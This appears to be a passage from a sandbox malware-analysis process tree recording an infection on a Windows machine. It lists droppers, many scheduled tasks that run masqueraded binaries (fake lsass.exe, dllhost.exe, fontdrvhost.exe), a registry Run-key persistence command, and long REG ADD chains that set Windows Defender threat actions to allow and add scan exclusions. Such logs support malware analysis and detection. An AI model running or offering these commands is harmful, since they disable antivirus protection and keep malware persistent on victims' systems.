"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pZ5VqEn4aUe5U49GuEbV9Zhu.exe" --version
5⤵
PID:6072

C:\Users\Admin\Pictures\hzzNenlkpEYAnKClmsqPkymt.exe
"C:\Users\Admin\Pictures\hzzNenlkpEYAnKClmsqPkymt.exe"
4⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\7zSAF0F.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:8132

C:\Users\Admin\Pictures\BT1UMIpiCjEV23O3BSmi8Qpa.exe
"C:\Users\Admin\Pictures\BT1UMIpiCjEV23O3BSmi8Qpa.exe"
4⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\7zSAF10.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:6148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
3⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
2⤵
PID:6032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
PID:1832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
3⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crypted_d786fd3e.exe"
2⤵
PID:7068

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
2⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe
"C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe"
2⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\Files\ghhjhjhsg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghhjhjhsg.exe"
2⤵
PID:6836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\odt\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\PortproviderwinMonitorSvc\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\PortproviderwinMonitorSvc\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\PortproviderwinMonitorSvc\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "twztlt" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\twztl.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "twztl" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\twztl.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "twztlt" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\twztl.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4240

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004E0
1⤵
PID:5652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1548 -ip 1548
1⤵
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5792 -ip 5792
1⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2056 -ip 2056
1⤵
PID:5824

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5928 -ip 5928
1⤵
PID:7820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5928 -ip 5928
1⤵
PID:8048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7804 -ip 7804
1⤵
PID:7396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7804 -ip 7804
1⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4052 -ip 4052
1⤵
PID:7524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4612 -ip 4612
1⤵
PID:2680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6792 -ip 6792
1⤵
PID:7472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5952 -ip 5952
1⤵
PID:6248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7608 -ip 7608
1⤵
PID:7428

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\XcqYegK.exe mP /VIsite_idOHu 385118 /S
1⤵
PID:4704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6284

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:6792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:7160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:7104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:8044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:7164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:7492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:8000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:2648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:6676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:7404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:6160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:7556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:7660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:7556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:3836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:6644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:6816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:7820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:1044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FryTaOrDbWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FryTaOrDbWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\amAbAfOnXOhKC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\amAbAfOnXOhKC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mGmtaSbzEpNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mGmtaSbzEpNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAxUdthdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAxUdthdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LzVMcwpfdAtFXBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LzVMcwpfdAtFXBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qUDHiGcWmqaEfibr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\qUDHiGcWmqaEfibr\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:8280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4084

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:6900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FryTaOrDbWUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\amAbAfOnXOhKC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\amAbAfOnXOhKC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2924

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mGmtaSbzEpNU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mGmtaSbzEpNU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAxUdthdU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAxUdthdU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LzVMcwpfdAtFXBVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:8320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LzVMcwpfdAtFXBVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:7952

C:\Windows\SysWOW64\reg.exe
